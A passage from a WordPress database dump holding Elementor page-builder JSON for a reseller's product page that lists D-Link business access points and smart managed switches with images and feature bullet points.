Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9771aa\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"394708f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4e739a4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<\\/p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<\\/p><p>Support IEEE 802.1Q VLAN traffic segregation<\\/p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems<\\/p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime<\\/p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation<\\/p><p>Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e75b16a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"0a878f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9ec8985\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":494,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"7a7732d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<\\/p><p>Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<\\/p><p>Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<\\/p><p>Support IEEE 802.1Q VLAN traffic segregation<\\/p><p>Access Control List (ACL) feature to enhances network security<\\/p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems<\\/p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime<\\/p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation<\\/p><p>Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>Cable diagnostics function to help troubleshooting wiring problem<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a7b2c74\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"2d0384d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>Virtual stacking of up to 32 units via D-link\\u2019s Single IP Management (SIM)<\\/p><p>Built-in SNMP MIB for remote Network Management Systems<\\/p><p>Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support Layer 2 Features \\u2013 IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>Virtual stacking of up to 32 units via D-link\\u2019s Single IP Management (SIM)<\\/p><p>Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support Layer 2 Features \\u2013 IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>Virtual stacking of up to 32 units via D-link\\u2019s Single IP Management (SIM)<\\/p><p>Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support Layer 2 Features \\u2013 IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"80aad36\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center><p>\\u00a0<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3457,2632,'_wp_page_template','template-fullwidth.php'),(3458,2632,'_elementor_edit_mode','builder'),(3459,2632,'_elementor_template_type','post'),(3460,2632,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8ce36a6\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"16bb526\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a8892e\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"7b1ec0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f3befd1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c79b115\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0a7395\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f0e6f8e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"62f238e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ecbb61f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"89c052d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bee4f1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>- Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>- Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>- Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>- Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0dd89dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a8eceff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>\\u2022 Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>\\u2022 Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>\\u2022 Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>\\u2022 Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>\\u2022 Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>\\u2022 Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>\\u2022 Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>\\u2022 Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cea9196\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"932549b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b9b1275\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"008ef23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"671f8ae\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"7a8833d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dbc3f40\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"93fc91a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d70abb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d3625d1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d8c8530\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dd07de7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9a1a792\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d96783a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3443,2630,'_wp_page_template','template-fullwidth.php'),(3444,2630,'_elementor_edit_mode','builder'),(3445,2630,'_elementor_template_type','post'),(3446,2630,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"571f7059\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"793fc4e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"274a3e4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><table><tbody><tr><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2359\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\\\" alt=\\\"\\\" width=\\\"500\\\" height=\\\"500\\\" \\/><\\/p><p>AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point<\\/p><p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central 